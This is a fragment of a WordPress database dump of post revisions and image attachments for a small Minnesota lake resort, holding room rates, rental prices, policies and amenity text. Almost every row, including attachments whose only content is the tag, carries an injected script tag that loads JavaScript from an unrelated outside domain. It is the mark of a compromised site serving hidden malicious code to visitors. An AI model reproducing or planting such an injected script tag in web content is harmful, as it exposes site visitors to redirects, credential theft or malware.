AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-05 09:04:02','2016-09-05 14:04:02','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(248,2,'2016-09-05 09:09:35','2016-09-05 14:09:35','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$25.00,$30.00,$130.00,\"$1300.00\",\r\nCamping Electric Sites,1  per site,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-05 09:09:35','2016-09-05 14:09:35','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(249,2,'2016-09-05 09:10:57','2016-09-05 14:10:57','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$25.00,$30.00,$130.00,\"$1300.00\",\r\nCamping Electric Sites,1  per site,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-05 09:10:57','2016-09-05 14:10:57','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(251,2,'2016-09-05 09:14:19','2016-09-05 14:14:19','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$25.00,$30.00,$130.00,\"$1300.00\",\r\nCamping Electric Sites,1  per site,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-05 09:14:19','2016-09-05 14:14:19','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(252,2,'2016-09-05 09:41:47','2016-09-05 14:41:47','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3879','','inherit','open','closed','','dscn3879','','','2016-09-05 09:41:47','2016-09-05 14:41:47','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3879.jpg',0,'attachment','image/jpeg',0),(253,2,'2016-09-05 09:42:12','2016-09-05 14:42:12','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3881','','inherit','open','closed','','dscn3881','','','2016-09-05 09:42:12','2016-09-05 14:42:12','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3881.jpg',0,'attachment','image/jpeg',0),(254,2,'2016-09-05 09:43:14','2016-09-05 14:43:14','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3872','','inherit','open','closed','','dscn3872','','','2016-09-05 09:43:14','2016-09-05 14:43:14','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872.jpg',0,'attachment','image/jpeg',0),(255,2,'2016-09-05 09:43:40','2016-09-05 14:43:40','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3873','','inherit','open','closed','','dscn3873','','','2016-09-05 09:43:40','2016-09-05 14:43:40','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3873.jpg',0,'attachment','image/jpeg',0),(256,2,'2016-09-05 09:44:06','2016-09-05 14:44:06','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3874','','inherit','open','closed','','dscn3874','','','2016-09-05 09:44:06','2016-09-05 14:44:06','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3874.jpg',0,'attachment','image/jpeg',0),(257,2,'2016-09-05 09:44:32','2016-09-05 14:44:32','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3875','','inherit','open','closed','','dscn3875','','','2016-09-05 09:44:32','2016-09-05 14:44:32','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3875.jpg',0,'attachment','image/jpeg',0),(258,2,'2016-09-05 09:44:58','2016-09-05 14:44:58','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','DSCN3876','','inherit','open','closed','','dscn3876','','','2016-09-05 09:44:58','2016-09-05 14:44:58','',0,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3876.jpg',0,'attachment','image/jpeg',0),(263,2,'2016-09-06 12:41:23','2016-09-06 17:41:23','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$35.00,$35.00,$180.00,\"$1800.00\",\r\nCamping Electric Sites,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-06 12:41:23','2016-09-06 17:41:23','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(264,2,'2016-09-06 12:42:24','2016-09-06 17:42:24','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1,050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nCamping Electric Sites,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-06 12:42:24','2016-09-06 17:42:24','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(265,2,'2016-09-06 12:45:12','2016-09-06 17:45:12','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2017 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$875.00,$1050.00,4\r\nCabins (#10 #11 #12),2,$175.00,$225.00,$875.00,\"$1,050.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$975.00,\"$1,150.00\",8\r\nCamping Non Electric Site,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nCamping Electric Sites,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-09-06 12:45:12','2016-09-06 17:45:12','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(266,2,'2016-09-06 12:47:11','2016-09-06 17:47:11','To make your stay more fun, we have paddle boards, a paddle boat, kayaks, canoes, fishing boats and pontoon to rent.\r\n\r\nThe fish cleaning house is a great place to gather and hear about where the fish are biting.\r\n\r\nWe have a sandy beach with a playground, horeshoes, dock fishing, dockside gas and a private boat launch.\r\n\r\nThe Resort is located right next to the Central Lakes Bike and Snowmobile Trail\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Amenities','','inherit','closed','closed','','40-revision-v1','','','2016-09-06 12:47:11','2016-09-06 17:47:11','',40,'http://ashbyresort.com/40-revision-v1/',0,'revision','',0),(267,2,'2016-09-06 12:49:54','2016-09-06 17:49:54','<img class=\"alignnone size-medium wp-image-179\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2718-300x225.jpg\" alt=\"DSCN2718\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-181\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2974-300x225.jpg\" alt=\"DSCN2974\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-182\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3007-300x225.jpg\" alt=\"DSCN3007\" width=\"300\" height=\"225\" />\r\n<h3>Our Resort is right next to the <a href=\"http://centrallakestrail.com\" target=\"_blank\">Central Lakes Trail </a></h3>\r\n<h3>Bring Your Bike the trail is very scenic and level for all ages to enjoy.</h3><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Biking','','inherit','closed','closed','','64-revision-v1','','','2016-09-06 12:49:54','2016-09-06 17:49:54','',64,'http://ashbyresort.com/64-revision-v1/',0,'revision','',0),(269,2,'2016-09-06 12:55:36','2016-09-06 17:55:36','<img class=\"alignnone size-medium wp-image-169\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3601-300x225.jpg\" alt=\"DSCN3601\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-170\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3611-300x225.jpg\" alt=\"DSCN3611\" width=\"300\" height=\"225\" /> <img class=\"alignnone size-medium wp-image-171\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_20160529_165358_102-169x300.jpg\" alt=\"IMG_20160529_165358_102\" 